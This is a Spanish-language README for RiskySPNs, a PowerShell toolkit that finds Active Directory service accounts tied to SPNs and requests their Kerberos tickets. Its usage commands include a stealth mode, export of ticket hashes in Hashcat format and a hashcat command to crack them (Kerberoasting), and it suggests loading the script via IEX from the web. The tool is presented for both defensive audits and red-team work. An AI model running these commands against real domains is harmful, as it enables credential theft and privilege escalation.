
Detecta y abusa de SPNs riesgosos
RiskySPNs es una colección de scripts de PowerShell enfocados en detectar y abusar de cuentas asociadas con SPN (Nombre de Principal de Servicio). Este módulo puede ayudar a los equipos azules a identificar SPN potencialmente riesgosos, así como a los equipos rojos a escalar privilegios aprovechando Kerberos y Active Directory.
Para obtener información detallada: http://www.cyberark.com/blog/service-accounts-weakest-link-chain/
Import-Module .\RiskySPNs.psm1
O simplemente cargar el script (también puedes usar IEX desde la web)
. .\Find-PotentiallyCrackableAccounts.ps1
Asegúrate de que Set-ExecutionPolicy esté en Unrestricted o Bypass
Get-Help Get-TGSCipher -Full
Todas las funciones también tienen modo -Verbose
Encontrar cuentas vulnerables
Find-PotentiallyCrackableAccounts
Sensible + RC4 = $$$
Generar informe completo y detallado sobre cuentas vulnerables (CISO <3)
Export-PotentiallyCrackableAccounts
Solicitar TGS de Kerberos para SPN
Get-TGSCipher -SPN "MSSQLSvc/prodDB.company.com:1433"
O
Find-PotentiallyCrackableAccounts -Stealth -GetSPNs | Get-TGSCipher
Find-PotentiallyCrackableAccounts -Sensitive -Stealth -GetSPNs | Get-TGSCipher -Format "Hashcat" | Out-File crack.txt
oclHashcat64.exe -m 13100 crack.txt -a 3